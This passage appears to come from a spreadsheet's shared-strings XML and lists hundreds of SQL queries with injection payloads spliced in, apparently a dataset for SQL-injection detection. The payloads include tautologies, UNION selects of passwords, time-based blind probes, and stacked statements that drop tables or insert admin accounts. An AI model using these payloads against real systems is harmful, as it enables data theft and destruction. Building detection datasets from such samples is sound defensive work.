    <t>SELECT * FROM users WHERE username = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = 'ddd' group by (password)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''ddd"' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' 1' AND non_existant_table = '1 ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' '' ' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '"'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '''</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * from username where type = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT 1,2, 'sqlvuln FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' hi' or 1=1 --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' 1 OR 1=1-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT 1,2, '' FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' admin'-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = '"'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 'a'='a'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 'a'='a' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 1 EXEC XP_ ' and password=''</t>
  </si>
  <si>
    <t>SELECT email from users where email = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT 1,2, 1' AND non_existant_table = '1 FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' a' or 'a' = 'a' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''union select all 1,2,x,x,x,x --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/' and password=''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * from user where id =''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' 1' AND non_existant_table = '1 ' and password = ''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</si>
  <si>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user_name='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/' and password='';</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' and password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, 'or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * from user where id =''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = 'ddd' union select username,password from students --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 'a'='a' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 0=0 #' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''ddd"'</t>
  </si>
  <si>
    <t>SELECT 1,2, ' FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' hi' or 1=1 --'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' 1 AND USER_NAME() = \'dbo\'-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' admin'-- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or 'a'='a' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id 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</si>
  <si>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''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' 'sqlvuln'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput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</si>
  <si>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users WHERE name='"' and password=''</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' a' or 'a' = 'a'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='' union select password from users --' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' admin'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' a' waitfor delay '0:0:10'--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT 1,2, '; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'ddd' compute sum(username)--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' a' or 'a' = 'a' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' hi' or 1=1 --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' 'sqlvuln' AND password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1' AND non_existant_table = '1 ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' 1 AND 1=1-- '</t>
  </si>
  <si>
    <t>SELECT 1,2, 'or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 'x'='x'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' \\'; DESC users; -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='ddd' union select username,password from students --' and password='';</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''; DROP table Username --' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''ddd"'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' '' ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name='ddd' group by (studentid)--' and password=''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1 UNION SELECT ALL FROM WHERE--' and password='';</t>
  </si>
  <si>
    <t>SELECT * from user where id =' admin'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = '''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' 1 AND USER_NAME() = \'dbo\'-- '</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' admin'-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = 'ddd' group by (studentid)--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = 'ddd' union select username from students --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' admin'-- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 1 UNION SELECT ALL FROM WHERE--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' '%31%27%20%4F%52%20%27%31%27%3D%27%31' and password=''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ' ' or 1 EXEC XP_ '</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ' ' or a=a--'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or 'x'='x' and password=''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = '''</t>
  </si>
  <si>
    <t>SELECT 1,2, ' or 1 EXEC XP_ FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- ' AND password = ''</t>
  </si>
  <si>
    <t>SELECT 1,2, 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '%31%27%20%4F%52%20%27%31%27%3D%27%31' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' a' or 1=1--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' '' ' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = '"'</t>
  </si>
  <si>
    <t>SELECT * from user where id =''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = '' union select password from users --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- '</t>
  </si>
  <si>
    <t>SELECT * from username where type = '''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''or 1=1; DELETE FROM Grades WHERE course='attacker class' AND studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or (1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=\'U\'), 1, 1))) &gt; 116)-- ' and password='';</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' OR username IS NOT NULL OR username = ' '</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31'</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = 'ddd' union select username from students --' AND password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' a' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = 'ddd' union select username from students --'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</si>
  <si>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</si>
  <si>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custTable WHERE User=' '%31%27%20%4F%52%20%27%31%27%3D%27%31' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory='IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)&lt;5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),โ€SLEEP(1)))OR"*/'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</si>
  <si>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'news' WHERE 'id' = ' a' waitfor delay '0:0:10'--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' OR username IS NOT NULL OR username = ' ' and password=''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = '' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' a' waitfor delay '0:0:10'--' and password=''</t>
  </si>
  <si>
    <t>SELECT * from table where username = 'ddd' group by (password)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = 'ddd' group by (password)--'</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = ''; TRUNCATE TABLE Username; --'</t>
  </si>
  <si>
    <t>SELECT 1,2, admin'-- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' OR 1=1-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--'</t>
  </si>
  <si>
    <t>SELECT * FROM profiles WHERE ID = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' 1\\'1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' 1' AND non_existant_table = '1 ' and password=''</t>
  </si>
  <si>
    <t>SELECT * from user where id ='"'</t>
  </si>
  <si>
    <t>SELECT * from username where type = ''union select 1,2,3,x,x,x,x,@@version,x--'</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' ' or 0=0 #'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM students WHERE username = ' a' or 1=1--' AND password = ''</t>
  </si>
  <si>
    <t>SELECT data FROM table WHERE Emailinput = '''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from user where id ='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * FROM some_table WHERE double_quotes = ''; DROP table Username --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = '' and 1 = any (select 1 from users where FULL_NAME like โ€%%dministratorโ€ and rownum&lt;=1 and PASSWORD like โ€0%โ€) and โ€1%%โ€=โ€1' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''union select all 1,2,x,x,x,x --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=''union select all 1,2,x,x,x,x --'</t>
  </si>
  <si>
    <t>SELECT * from user where id ='ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' or 1 UNION SELECT ALL FROM WHERE--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' a' waitfor delay '0:0:10'--' and password = ''</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' admin'-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = '' union select password from users --'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' OR 1=1-- ' and password=''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= 'ddd' union select username,password from students --'</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' a' waitfor delay '0:0:10'--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' '; UPDATE table SET email = 'hacker@ymail.com' WHERE email = 'joe@ymail.com-- '</t>
  </si>
  <si>
    <t>SELECT * from username where type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</si>
  <si>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custTable WHERE User=' a' or 1=1--' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * from user where id ='ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * from table where username = 'ddd' compute sum(username)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or (1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = \'U\') -- '</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = '"' and password = ''</t>
  </si>
  <si>
    <t>SELECT email from users where email = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM product WHERE PCategory=' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT 1,2, '; DROP table Username -- FROM some_table WHERE ex = ample</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name='' AND 1=0 UNION SELECT '1', 'a', 'Robin', 'b' --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' '%31%27%20%4F%52%20%27%31%27%3D%27%31' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' ' or 1 UNION SELECT ALL FROM WHERE--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE name=' ' or a=a--' and password=''</t>
  </si>
  <si>
    <t>SELECT * from table where username = ' ' 1 OR 1=1-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT * from table where username = 'ddd' group by (studentid)--' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' ' 1 OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * from table where username = ''' and password = ''</t>
  </si>
  <si>
    <t>SELECT * FROM users WHERE username = ' \\'; DESC users; -- '</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' or 1=1--'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=' ' or 0=0 #' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' '' '</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=''; TRUNCATE TABLE Username; --' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= ' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = 'ddd' group by (studentid)--'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ' ' or 0=0 --'</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ' ' 1 OR 1=1-- ' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from user where id =' 1' AND non_existant_table = '1 '</t>
  </si>
  <si>
    <t>SELECT * from user where id =' ' OR 1=1-- '</t>
  </si>
  <si>
    <t>SELECT email from users where email = ' 1' AND 1=(SELECT COUNT(*) FROM tablenames); -- '</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''or 1=1; SET IDENTITY_INSERT Students ON INSERT INTO Students (StudentID, Username, Password) VALUES (attacker studentid, 'attacker username','attacker password');--' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM customers WHERE username = ' 1 AND USER_NAME() = \'dbo\'-- ' and password = ''</t>
  </si>
  <si>
    <t>SELECT user_name,password from test.members where user_name= 'ddd' compute sum(username)--'</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' admin'-- ' OR 1=1'-- AND Pass=?</t>
  </si>
  <si>
    <t>SELECT * FROM custTable WHERE User=' ''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</si>
  <si>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</si>
  <si>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'news' WHERE 'id' = ' ' or 0=0 #' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''union select all 1,2,x,x,x,x --' and password='';</t>
  </si>
  <si>
    <t>SELECT * FROM 'news' WHERE 'id' = ''; TRUNCATE TABLE Username; --' ORDER BY 'id' DESC LIMIT 0,3</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''or 1=1; UPDATE Grades SET grade='attacker grade' WHERE studentId=attacker studentid;--'</t>
  </si>
  <si>
    <t>SELECT * FROM newsletter WHERE email = ''; INSERT into Username (username, password, user_type) value('admin2', 'admin2', '1'); --'</t>
  </si>
  <si>
    <t>SELECT * from test.members where user_name=''' and password='';</t>
  </si>
  <si>
    <t>SELECT id FROM Users WHERE username = ' admin'-- '</t>
  </si>
  <si>
